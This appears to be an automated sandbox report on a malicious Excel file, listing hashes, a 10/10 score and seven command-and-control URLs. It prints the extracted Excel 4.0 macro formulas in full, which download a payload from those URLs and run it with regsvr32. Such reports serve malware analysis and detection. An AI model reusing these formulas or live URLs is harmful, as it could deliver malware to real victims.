General

  • Target

    41ac95d706ffd4a11464c18e29b2b7adb9b5f4677bed19c2eeabc406c1ffbda0

  • Size

    38KB

  • Sample

    241120-vybhgazndw

  • MD5

    a890d2eeb4660c01f81d3b3eaf5f114d

  • SHA1

    02554e41b38e3bf51bb5f2240e8c93df370d0560

  • SHA256

    41ac95d706ffd4a11464c18e29b2b7adb9b5f4677bed19c2eeabc406c1ffbda0

  • SHA512

    26872964dfea935f8654c4b30b24394602f53caa7be4c9764cc13267400256c7aa0b9023661123599a65dfed26e40cdd441ce3dbf3d960faf435c0b17fbf0685

  • SSDEEP

    768:psnACdQR84jOZpqcVbZYpoRuBlIiOKMArOooooooooooooooooooooooooooFVIX:CA6gvOZZ1ZYpoQ/pMAeVIyP54T

Score
10/10

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

https://landingpageis.com/alfacgiapi/IhZmV1LIJwi6O/

https://londoninsurancelife-lmg.com/wp-content/HukqubgSP/

https://franciscosobrado.com/wp-content/xp/

https://britainsolicitors.com/wp-admin/disNolZkYooJTascNDEk/

https://www.curtisse.com/wordpress/kXUx9P38X/

https://bsprabodhini.org/wp-content/i1e8aSEloGChNad3m/

https://toyota-4wd.com/wp-content/55d3MMJGg6CMSFhS/

Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://landingpageis.com/alfacgiapi/IhZmV1LIJwi6O/","..\roil.ocx",0,0) =IF('HUNJK'!E15<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://londoninsurancelife-lmg.com/wp-content/HukqubgSP/","..\roil.ocx",0,0)) =IF('HUNJK'!E17<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://franciscosobrado.com/wp-content/xp/","..\roil.ocx",0,0)) =IF('HUNJK'!E19<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://britainsolicitors.com/wp-admin/disNolZkYooJTascNDEk/","..\roil.ocx",0,0)) =IF('HUNJK'!E21<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.curtisse.com/wordpress/kXUx9P38X/","..\roil.ocx",0,0)) =IF('HUNJK'!E23<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://bsprabodhini.org/wp-content/i1e8aSEloGChNad3m/","..\roil.ocx",0,0)) =IF('HUNJK'!E25<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://toyota-4wd.com/wp-content/55d3MMJGg6CMSFhS/","..\roil.ocx",0,0)) =IF('HUNJK'!E27<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\roil.ocx") =RETURN()

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

https://landingpageis.com/alfacgiapi/IhZmV1LIJwi6O/

Targets

    • Target

      41ac95d706ffd4a11464c18e29b2b7adb9b5f4677bed19c2eeabc406c1ffbda0

    • Size

      38KB

    • MD5

      a890d2eeb4660c01f81d3b3eaf5f114d

    • SHA1

      02554e41b38e3bf51bb5f2240e8c93df370d0560

    • SHA256

      41ac95d706ffd4a11464c18e29b2b7adb9b5f4677bed19c2eeabc406c1ffbda0

    • SHA512

      26872964dfea935f8654c4b30b24394602f53caa7be4c9764cc13267400256c7aa0b9023661123599a65dfed26e40cdd441ce3dbf3d960faf435c0b17fbf0685

    • SSDEEP

      768:psnACdQR84jOZpqcVbZYpoRuBlIiOKMArOooooooooooooooooooooooooooFVIX:CA6gvOZZ1ZYpoQ/pMAeVIyP54T

    Score
    10/10
    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

MITRE ATT&CK Enterprise v15

Tasks